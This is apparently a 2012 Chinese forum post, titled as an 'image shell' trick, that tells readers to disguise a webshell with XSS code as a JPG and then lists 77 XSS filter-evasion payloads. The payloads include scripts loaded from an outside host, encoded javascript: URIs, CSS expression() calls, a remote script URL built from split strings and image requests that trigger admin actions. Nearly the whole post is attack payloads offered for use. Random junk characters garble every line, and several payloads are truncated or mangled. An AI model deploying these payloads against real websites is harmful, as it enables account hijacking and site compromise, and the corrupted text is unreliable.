跨站图片shell
2 A i" A( q1 u( _ _9 cXSS跨站代码 <script>alert("")</script>
3 k5 b4 U, |4 p* w/ z8 E6 P3 c* h, b* x; N) j) X
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马+ P3 o; F& v& W/ k2 K( t8 d7 S' x
9 C6 X4 o/ G' B' Y$ E4 |3 i, o6 }1 R$ c
- h. b; ^' ?; I% t6 G1 a1)普通的XSS JavaScript注入6 h9 Y2 c |: v! |
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 a3 l4 \; @' a; T' v# y$ g, [+ m7 a0 U( D0 J. R/ h; s
(2)IMG标签XSS使用JavaScript命令
2 u( a8 N2 o) J6 u$ n4 _/ v<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ C/ Z9 B% V4 T4 K
. s$ U, n5 R! D5 _, K
(3)IMG标签无分号无引号
7 L/ d6 B+ H8 J8 {. E<IMG SRC=javascript:alert(‘XSS’)>
1 B Y2 n! `( @& j6 r
1 R! r/ V& G/ E% |( ](4)IMG标签大小写不敏感
) }7 w3 X5 {' k# M! s<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
; x! m7 {1 p M9 }5 A$ x( g# n$ q8 m3 _8 g+ @2 v$ E
(5)HTML编码(必须有分号)
9 `2 ^! X# x J' Z7 C<IMG SRC=javascript:alert(“XSS”)>! p: H4 ]/ n# A7 e
+ M* c$ Q7 x' \ a( g
(6)修正缺陷IMG标签& h7 W1 }4 m, c# M8 \
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 ~9 R ?& \2 g' f9 A9 {
! x: Z/ K% U! {9 K) t0 Q) j
(7)formCharCode标签(计算器)
. q* ~$ d+ f9 M0 w& X% ~! F<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))># m$ S; R6 {( ^' v! X! q
& K4 R K8 `: T4 j(8)UTF-8的Unicode编码(计算器)! ]+ a0 {9 Y- `! a Y' M* K1 g
<IMG SRC=jav..省略..S')>* t; B/ e* ` N3 z
: Q5 u5 f- P' P, E' S" e$ a
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)$ a0 j: z% O" l6 q" l3 S2 a
<IMG SRC=jav..省略..S')>' Q- \5 x* G# m0 r% a
8 {0 R) @, X/ I+ L4 a3 K0 w(10)十六进制编码也是没有分号(计算器)" b% O) _8 }( o3 ^3 D0 q
<IMG SRC=java..省略..XSS')>
" k+ c) }7 f I& m; N) }; q, c
: {* u' f: h0 ^& l4 d(11)嵌入式标签,将Javascript分开
, a7 n% }2 b" A& f* I<IMG SRC=”jav ascript:alert(‘XSS’);”>
- a, {6 |' s3 A9 t
1 Q+ S" |8 g) s3 ~# u {(12)嵌入式编码标签,将Javascript分开6 S1 R- x5 i3 z9 D
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 ^, ~+ u/ Q7 u, q& q; f# ~2 Z. [; z- M" G7 m; u( N' }
(13)嵌入式换行符
' P9 ^* n4 d# `! z8 m' G# T, l<IMG SRC=”jav ascript:alert(‘XSS’);”>0 H0 B, ]1 u! W( y) ~
Z; ~' G$ J* Q( e) S(14)嵌入式回车: k0 X; e" ?( M3 L+ _
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& Q: A: H9 t- N5 S! u1 F4 k. Z
" a" I& D- l0 O& e: E(15)嵌入式多行注入JavaScript,这是XSS极端的例子
- _8 |. ^* R5 @* F0 @<IMG SRC=”javascript:alert(‘XSS‘)”>4 q7 G" ]! }% T8 K! K
% {0 C* I4 O. m' |7 i8 U; t% X
(16)解决限制字符(要求同页面)
" B7 K. F N0 _$ t1 j4 z; M) E5 r<script>z=’document.’</script>; S( ^4 t1 }: q9 E3 |$ _2 W
<script>z=z+’write(“‘</script>
% v. G( u3 d1 Q8 w5 W<script>z=z+’<script’</script>
& }; F! R3 M+ p& A- {2 m' j9 W& a, s<script>z=z+’ src=ht’</script>
- a& h+ g$ c1 b<script>z=z+’tp://ww’</script>
7 [! b, s* i( K: @. ]+ U9 K5 T<script>z=z+’w.shell’</script>$ P! X2 j* l1 b7 b5 \
<script>z=z+’.net/1.’</script>
9 h% J/ W0 j; s. O$ S<script>z=z+’js></sc’</script>
5 Z! N$ g. o1 C<script>z=z+’ript>”)’</script>) V5 L7 ` J; c
<script>eval_r(z)</script>- X4 `& b( b+ G; k+ D: A2 Y2 k
5 s% ]9 r0 E( z' a; |) ?(17)空字符! [5 c* v3 P [# L% Z, I, f* m7 v
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out [) W( r0 h2 p: b& q: a6 _
8 Q! d+ {3 o: L. W7 r8 Q; P9 D: O
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
' n7 H( s9 J- O0 Y- O; Xperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
% |# }' M5 h5 J7 j* Y8 [6 M! j0 _& f, m& S4 o7 ~
(19)Spaces和meta前的IMG标签
& L1 s7 n6 y0 o, K2 j& ?& p3 {% C<IMG SRC=” javascript:alert(‘XSS’);”>" n% S! X4 F% X# P2 B6 b$ t- ~
' b) t3 g1 E- h) Q% O- {(20)Non-alpha-non-digit XSS) z9 y7 c. I. ~, Z+ E; @5 [3 `
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>4 p' A; T1 a; _* j4 h! |1 {' ^
: T% B" Q% @3 O0 d; n(21)Non-alpha-non-digit XSS to 2
8 K, n) h5 K# v<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>3 Z. Y5 j2 }* g3 N
3 C% s6 V, [. q4 J$ n2 P
(22)Non-alpha-non-digit XSS to 3
5 x; G1 ^3 Y% ~; @ t<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 Y0 b, \5 w# y* F3 T' P
8 y, `2 ?6 B9 ]/ ]& c3 u! ^/ j(23)双开括号4 d8 C, l, a5 L& R5 N; V" k3 d
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
6 c' r( o# O2 r$ L0 s, {
, S4 N! Z2 i: F' w/ @(24)无结束脚本标记(仅火狐等浏览器)* ~1 [: x' o2 l: x5 m; ?. g
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>0 B7 W" [: v3 k. c% e6 x
) Y+ J7 O! e! n8 \( C* I$ g(25)无结束脚本标记2
8 v5 y! b) K: `! a3 r" z k. c<SCRIPT SRC=//3w.org/XSS/xss.js>8 n' u* f4 k4 L, @
( k& g6 {% R6 n6 G, t
(26)半开的HTML/JavaScript XSS% n: c9 ~) ~# Q. L# E
<IMG SRC=”javascript:alert(‘XSS’)” y1 K9 g) l0 W* W T6 M
$ u8 H% a; V* z( H% l, k$ I(27)双开角括号
/ b5 H8 N1 _2 q! w' `<iframe src=http://3w.org/XSS.html <
$ _) z+ j8 G( H1 ^1 K8 f, {) |! x/ Y+ X1 F' R. n- I0 d
(28)无单引号 双引号 分号
/ e$ \2 q |% C<SCRIPT>a=/XSS/
5 B+ P1 a6 \, [* Oalert(a.source)</SCRIPT>
, B0 d2 a6 S5 Q6 w) }5 ~- M6 x7 g, y8 j [+ S
(29)换码过滤的JavaScript& }+ q7 s4 D1 ]' J1 v
\”;alert(‘XSS’);//
$ P( V4 [# }- _, f7 T) S m
6 ^8 I1 o8 D$ M; o- T8 f(30)结束Title标签
, F) q9 n9 u. B/ i</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
! [6 V2 H5 u8 |- S+ l
8 v3 f) T/ p2 s- ?) U(31)Input Image8 Y0 G! R, o5 B/ i; M
<INPUT SRC=”javascript:alert(‘XSS’);”>7 ^- L2 w8 n4 V* G2 d1 j
8 R) s, A& X/ Y. k7 [3 n( q* z(32)BODY Image
5 r; S" R. F: U R$ ~<BODY BACKGROUND=”javascript:alert(‘XSS’)”>/ @4 x+ T! U! n" N: d; n
5 V, z# f6 p3 D. @(33)BODY标签
5 F5 X/ N( a3 a<BODY(‘XSS’)>% h! _; h- ^* ?& s
( k0 d3 V/ o# d0 m& d! V(34)IMG Dynsrc
1 o a6 a+ ^+ E: ]9 Q( ~+ E) ^" X<IMG DYNSRC=”javascript:alert(‘XSS’)”>$ t# ~/ W% a6 s7 g
4 d( }8 y0 _6 o' w( F(35)IMG Lowsrc
) P4 I$ c+ H: R. |<IMG LOWSRC=”javascript:alert(‘XSS’)”>
' f" a- H. w0 o& A% G4 \$ y( b. ~& U& ^+ e, [
(36)BGSOUND
7 ]8 B% Y8 ]" p7 t<BGSOUND SRC=”javascript:alert(‘XSS’);”>" q5 u6 f1 m0 C, a3 a( k
) T% V; U- e- A# q5 B2 |3 X# r7 q(37)STYLE sheet4 x; p" m* `! T4 ^6 V& @
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 X( |% X' @; i/ x7 M( q6 N& ?% h& ~* D3 A* u8 q; Q
(38)远程样式表
6 _9 C# B2 c" `: B<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>" _$ U' S* Y0 I1 m x- ^' R) D
' B8 W) T* {# H0 r5 Q$ [7 ?, y
(39)List-style-image(列表式)
+ Q! r% q, Q3 R1 N<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS2 R& A5 D [# k( K, m
% _' o# U: F5 W! x(40)IMG VBscript
+ D- a- n) T; ]5 E- s& N<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS9 G0 |4 Y* C! k; \# x
( Y% X+ l! H9 U4 z- S9 z, P P(41)META链接url
- e! G$ [4 E& E# S& C<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>& ~' ?1 O% X2 a7 ]' G, l$ F% Q. @
- H5 v( B5 d2 H- j1 O
(42)Iframe
1 I) j0 ?2 q7 O8 p$ H2 h# r<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>4 A. O3 L( ]- q+ u; J
(43)Frame. J8 `& N7 s% X- |$ v2 P
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
/ H4 e7 p$ i! i9 X
; X3 u$ P& y- r' F! ?5 `* }, _4 u(44)Table
7 Q. F- r- d- Z: S7 o( w* Y, M<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>% [* d: a/ k5 j- ~; `* H5 M
1 }' R" @0 G8 e3 P ]$ M7 w
(45)TD
5 w3 d2 q% G2 {5 N8 l% A<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 v( M/ _1 m" ?( B* e5 A
, `/ C4 I6 S# c+ s(46)DIV background-image3 N+ i- n& R+ k
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
8 |5 W0 ?# L/ ]% Z& Z5 ?( q. U6 X6 G2 r: S% Y$ m
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
& v8 N/ [' @9 s9 i, \% Y<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
* V3 n: O# @2 k
! h! v7 `" A6 s! n2 A(48)DIV expression
4 k0 Q d2 N+ k& H- e X0 N<DIV STYLE=”width: expression_r(alert(‘XSS’));”># W; U# p0 I( z/ `
7 b K! I$ s; V: W
(49)STYLE属性分拆表达
* G9 E+ N8 D) ~" n, c! J2 T<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ ?: q$ L7 C$ X/ N& z
' m+ v5 C/ L8 }% ^- z" _(50)匿名STYLE(组成:开角号和一个字母开头). ~6 F) g8 p. W- u% Q6 `
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>$ Z C: C9 r: Q7 j G! D) m& i
" b% Z. C- j& R8 w( ~ `(51)STYLE background-image
$ [0 m- f, @! p8 N" U<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>* t6 V; ^3 l# }! J! \( s
3 T0 J- S) N6 v: B, N1 ^
(52)IMG STYLE方式
1 U5 `# o) |/ G% F+ |exppression(alert(“XSS”))’>' o! M1 C: |4 }& K/ l* `6 R A
8 x3 f. y' x+ g5 f1 \
(53)STYLE background5 s: \9 j, Q$ l, i% X
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
' g& R! ~+ f8 j) B, R4 _9 n" T+ }0 N& h* L6 W! _8 v
(54)BASE
9 O6 I4 c5 e+ {4 B<BASE HREF=”javascript:alert(‘XSS’);//”>
0 U7 }& j Z `0 t2 v: \6 U% q" v! V* m y; I) V
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS% L& z" x+ G) N3 ]/ y( n1 n# N3 v
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>! v4 l5 t2 k* T4 h# b# t
7 i7 z2 g* b2 c. H( t(56)在flash中使用ActionScrpt可以混进你XSS的代码/ m! s# `" j" C' o l7 U0 v# @1 Q
a=”get”;% {" A. g- g# q$ s7 W
b=”URL(\”"; t# }0 R- f E; v: l
c=”javascript:”;" l; a8 a: c! ?% X4 V
d=”alert(‘XSS’);\”)”;
0 T8 I. D! d" U7 p6 [eval_r(a+b+c+d);* B8 T9 t2 O" O
' \3 V0 G, ~. s9 O(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上/ _& u6 @( G" w* o0 O
<HTML xmlns:xss>( Q* i% b2 s+ g) E6 C
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>2 y) W( r+ D: c# {0 d. B
<xss:xss>XSS</xss:xss>
+ D; S4 }! Z% [, |& `; x0 y</HTML>) p- v1 q0 [! b
5 \! O2 m5 E- U4 I1 x/ t' f; S(58)如果过滤了你的JS你可以在图片里添加JS代码来利用! [6 ^. G) j3 k: j
<SCRIPT SRC=””></SCRIPT>5 D2 N% l6 y/ j8 j. R1 T8 z* l
% Q7 B8 g0 B$ E! m1 ]* ~2 H
(59)IMG嵌入式命令,可执行任意命令
( S+ L# A Z0 Z# h8 q<IMG SRC=”http://www.XXX.com/a.php?a=b”>
- Z& f: O4 T, C/ m* i/ n2 x8 ?
2 |2 S4 h8 ^; f* m$ m0 L6 t(60)IMG嵌入式命令(a.jpg在同服务器)8 p3 Z( W/ M e$ ~1 Q: |
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
% q3 K [. I% `; z
2 ?. m6 H3 U) x0 [, f(61)绕符号过滤; B# r, b# j4 @, E5 ~# H9 |
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 P* A2 `. T2 T& `- _. y; b$ R! m" D+ A L U! n6 p& [
(62)7 j: B) K: Z5 [! D8 y2 o
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>6 d) n7 z0 X& s6 L, S s
, Q* E# b0 I; d! @7 T(63)
! X7 Y; @& h7 r. Y5 P8 [' T O<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>6 M+ U6 d8 \1 s
* Z7 w0 ?- G+ }* `(64)
/ h$ o1 ^; R' \2 j<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
3 f, m$ ?& G3 R& _
7 \* ]# L0 ?5 k& b) y5 c(65)
5 \9 J2 P4 g4 [" B<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>, ?; C* K7 l, C1 B5 {3 Z- N
3 B) J. ~( b6 D) t4 K, O
(66)
+ u3 P$ a- ?, W5 J; v: I0 _<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>0 Z% J$ Q$ Z. |+ ]
' }4 L9 N) A* o2 j3 R$ j; \
(67)+ }$ q0 K+ K9 Q. u/ U8 q
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
7 C! |( G, `- c5 J u9 f# N# q: t# |2 E4 | I
(68)URL绕行
' B# I5 B4 Z+ _6 {. ~3 i$ O+ l8 B<A HREF=”http://127.0.0.1/”>XSS</A>5 m9 f. l/ r6 I9 ?7 X
3 s6 e- Q# e& ?, [5 l i
(69)URL编码1 L# [3 X5 n5 E( ^( `) @& z T
<A HREF=”http://3w.org”>XSS</A>- m3 u8 }4 S/ N
8 p1 j7 ?1 g9 q+ r3 Q/ a q; x
(70)IP十进制
" _4 Z: M# H8 T" G<A HREF=”http://3232235521″>XSS</A>
: Z2 k+ A& P: E9 n! X* F7 \, o- }6 z- C
(71)IP十六进制
$ O* C* f- A2 @" C+ S3 m8 M0 M<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>, Z* O/ m7 X% } p
' h( {0 r- A& D {& C" E4 N(72)IP八进制/ {* x5 W9 Y# S o
<A HREF=”http://0300.0250.0000.0001″>XSS</A>* [# v8 y) |; j; c! o, Z
" K* e* t# R3 P. g(73)混合编码* X$ r- }* R; K$ X% q
<A HREF=”h
$ ^; Q8 X" p |0 C; \; N5 I5 ^tt p://6 6.000146.0×7.147/”">XSS</A>6 X, I& ^7 p' G' i. b E8 \- d
( }/ b/ e" @6 J(74)节省[http:]
! Y. y# ?5 @* X5 p9 y9 T<A HREF=”//www.google.com/”>XSS</A>0 `: m& g! }5 _: U5 d* p
1 J% A/ ?% f" { L j2 r! s, g/ |(75)节省[www]
* R" ^) ], o" X" j9 m<A HREF=”http://google.com/”>XSS</A>
9 b( b! ?6 u+ R& e7 U" y( w
8 M9 N& D6 Z+ b# U; k(76)绝对点绝对DNS
3 B( {7 o/ L. f! Y: b- _<A HREF=”http://www.google.com./”>XSS</A>; a3 j) r/ }) a3 Y+ |
9 G% Y# P( l. l% s& e0 x) }
(77)javascript链接: L+ a4 E' @0 u- ]: G& p
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>1 d- e! J3 o. N2 `
|
发表于 2012-9-13 17:04:56
收藏
支持
反对